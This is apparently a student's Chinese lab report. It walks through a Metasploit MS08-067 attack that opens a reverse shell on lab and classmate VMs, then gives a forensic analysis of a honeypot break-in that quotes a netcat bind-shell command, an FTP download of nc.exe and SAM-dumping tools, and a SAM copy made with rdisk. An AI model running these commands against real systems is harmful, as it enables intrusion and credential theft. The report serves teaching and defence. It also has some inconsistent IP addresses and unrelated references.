1.实验内容

（1）动手实践Metasploit windows attacker
任务：使用metasploit软件进行windows远程渗透统计实验
具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权
（2）取证分析实践：解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么
（3）团队对抗实践：windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）
防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

2.实验过程

2.1 动手实践Metasploit windows attacker
本次需要用到kali（IP为192.168.200.2，Win2k（IP为192.168.200.124）两台虚拟机
（1）连通性测试

（2）kali打开msfconsole工具

（3）输入search ms08_067查看漏洞模块信息，发现路径是exploit/windows/smb/ms08_067_netapi

（4）进入漏洞所在文件，输入命令：use windows/smb/ms08_067_netapi。
再输入命令 show options

（5）选择第三个载荷进行攻击，输入命令 使用set payload generic/shell_reverse_tcp查看载荷信息，同时使用命令set LHOST 192.168.200.2设置攻击机IP，使用命令set RHOST 192.168.200.124设置靶机Win2k的IP，输入命令exploit进行攻击，出现会话连接则攻击成功。

2.2 取证分析实践：解码一次成功的NT系统破解攻击
（1）下载文件后拖至kali使用wireshark打开，通过观察数据包的流向可以知道213.116.251.162为攻击者，172.16.1.106为靶机，我们以这两个ip为条件，使用ip.addr==213.116.251.162 && ip.addr==172.16.1.106筛选一下。
ip.addr==192.168.43.155 && ip.addr==172.168.43.170

（2）打开117这一行，发现攻击者打开了系统启动文件"boot.ini"，观察到数据中包含“%C0%AF”，“%C0%AF”为Unicode编码，因此推测为Unicode漏洞攻击

通过数据流可发现攻击者执行命令：cmd1.exe /c nc -l -p 6969 -e cmd1.exe，表示攻击者连接了6969端口，并且获得了访问权限

（3）在Wireshark中输入ftp进行筛选，发现1106行的ftp连接成功，右键追踪TCP流，可以看出：攻击者通过创建了ftpcom脚本，使用ftp连接 nether.net，并以johna2k为用户、haxedj00为密码下载 nc.exe、pdump.exe和samdump.dll

（4）通过数据流可发现攻击者执行命令：cmd1.exe /c nc -l -p 6969 -e cmd1.exe，表示攻击者连接了6969端口，并且获得了访问权限

（5）继续查看数据流，可以看到删除了http的文件，猜测攻击者准备溜走

（6）攻击者获得系统访问权限后进行了SQL注入

从这已经可以看出攻击者知道是蜜罐主机了
执行rdisk尝试获得SAM口令文件的拷贝，将SAM文件保存为c:\har.txt文件。
（7）如何防止这样的攻击
这个攻击事件中被利用的两个漏洞为RDS和Unicode漏洞，
直接防御措施：打补丁

进一步防御措施：IIS安全防范措施
禁用用不着的RDS等服务
为webserver在单独的文件卷上设置虚拟根目录
使用IIS Lockdown 和 URLScan 等工具加强web server
2.3 团队对抗实践：windows系统远程渗透攻击和分析

（1）
攻击机：192.168.43.188（自己）
靶机：192.168.43.217（同学）
kali启动msfconsole
输入指令为：use exploit/windows/smb/ms08_067_netapi 进入漏洞所在文件，set payload generic/shell_reverse_tcp查看载荷信息，同时使用命令set LHOST 192.168.43.188设置攻击机IP，使用命令set RHOST 192.168.43.217输入命令exploit进行攻击，出现会话连接则攻击成功。
连接后，在C盘创建文件。

之后便可在同学Win2k靶机中发现创建的文件夹以及写入的内容

（2）作为防守方在攻击机进行攻击时用wireshark进行抓包，并进行分析。
攻击机：192.168.43.170（同学）
靶机：192.168.43.155（自己）

wireshark中追踪TCP流也可查询到相关操作

3.学习中遇到的问题及解决

问题1：与同学连接同一校园网网段但ping不通
解决：改为连接同一热点局域网

4.学习感悟、思考等）

本周实验较为简单，主要是学习在window下的一些攻击方法，以及对数据包进行分析，从中得出一些攻击的信息，同时也首次在两台设备上进行了攻击与防守操作，获得了更多的经验和知识。

参考资料

《Java程序设计与数据结构教程（第二版）》
《Java程序设计与数据结构教程（第二版）》学习指导